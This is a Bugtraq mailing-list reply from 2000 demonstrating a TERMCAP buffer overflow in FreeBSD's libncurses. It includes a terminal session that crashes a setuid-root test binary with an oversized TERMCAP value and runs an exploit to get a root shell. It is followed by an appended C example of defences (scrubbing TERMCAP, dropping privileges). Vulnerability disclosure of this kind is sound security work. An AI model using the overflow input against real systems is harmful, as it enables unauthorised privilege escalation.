Bugtraq mailing list archives

Re: freebsd libncurses overflow


From: venglin () FREEBSD LUBLIN PL (Przemyslaw Frasunek)
Date: Tue, 25 Apr 2000 10:50:42 +0200


Furthermore, it is not actually a vulnerability. It seems that setuid
programs will not accept an alternate termcap file via TERMCAP even under
the old version of ncurses in FreeBSD 3.x. Therefore this "exploit" can
only be used on your own binaries.

Sure?

lubi:venglin:~> uname -a
FreeBSD lubi.freebsd.lublin.pl 3.4-STABLE FreeBSD 3.4-STABLE #1: Wed Mar  1
11:18:54 CET 2000
venglin () lubi freebsd lublin pl:/mnt/elite/usr/src/sys/compile/GADACZKA  i386
lubi:venglin:~> cat dupa.c
main() { initscr(); }
lubi:venglin:~> cc -o d dupa.c -lncurses
lubi:venglin:~> su
s/key 76 ve15188
Password:
lubi:venglin:/home/venglin# chmod 4755 d ; chown root.wheel d
lubi:venglin:/home/venglin# exit
lubi:venglin:~> ./d
lubi:venglin:~> setenv TERMCAP `perl -e 'print "A"x5000'`
lubi:venglin:~> ./d
Segmentation fault
lubi:venglin:~> ./dupaexp 4000
ret: 0xbfbfba8c
# id
uid=0(root) gid=1001(users) groups=1001(users), 0(wheel)

Obviously, *most* binaries are dropping root privileges before using any ncurses
functions.

--
* Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE *
* Inet: venglin () freebsd lublin pl ** PGP: D48684904685DF43  EA93AFA13BE170BF *
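As an added example (not code from the post, from FreeBSD or from ncurses), the two defences the thread points at, written for a setuid program in C: refuse an attacker-supplied TERMCAP before the first ncurses call, and drop root for good before initscr(). The issetugid() check is FreeBSD-specific (with a getuid()/geteuid() fallback elsewhere); the 1024-byte limit and all function names are assumptions.

```c
#define _DEFAULT_SOURCE                 /* setenv/unsetenv on glibc in strict mode */
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
/* Assumed limit: a genuine inline termcap entry is a few hundred bytes. */
#define TERMCAP_MAX_LEN 1024
/* 1 if the process holds privileges the invoking user does not have. */
int running_privileged(void)
{
#ifdef __FreeBSD__
    return issetugid();                 /* BSD call, exact answer */
#else
    return getuid() != geteuid() || getgid() != getegid();
#endif
}

/* Unset TERMCAP when privileged (never trust it then) or when the inline
 * entry is oversized, like the 5000-byte value in the post. Returns 1 if removed. */
int scrub_termcap(int privileged)
{
    const char *val = getenv("TERMCAP");
    if (val == NULL) return 0;          /* unset: library falls back to its file */
    if (privileged || strlen(val) > TERMCAP_MAX_LEN) {
        unsetenv("TERMCAP");
        return 1;
    }
    return 0;
}

/* The other defence the post mentions: give up root for good before initscr(). */
int drop_privileges(void)
{
    uid_t uid = getuid();
    gid_t gid = getgid();
    if (setgid(gid) != 0 || setuid(uid) != 0) return -1;
    return (geteuid() == uid && getegid() == gid) ? 0 : -1;   /* verify the drop */
}

/* Constructed self-check; returns how many of the three expectations hold. */
int self_check(void)
{
    char big[5001]; int passed = 0;
    memset(big, 'A', 5000); big[5000] = '\0';
    setenv("TERMCAP", big, 1);                      /* oversized, unprivileged */
    if (scrub_termcap(0) == 1 && getenv("TERMCAP") == NULL) passed++;
    setenv("TERMCAP", "xterm:co#80:li#24:", 1);     /* sane entry, unprivileged */
    if (scrub_termcap(0) == 0 && getenv("TERMCAP") != NULL) passed++;
    if (scrub_termcap(1) == 1 && getenv("TERMCAP") == NULL) passed++; /* setuid */
    return passed;
}
```

In a real setuid binary call scrub_termcap(running_privileged()) and drop_privileges() before initscr(), not after.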


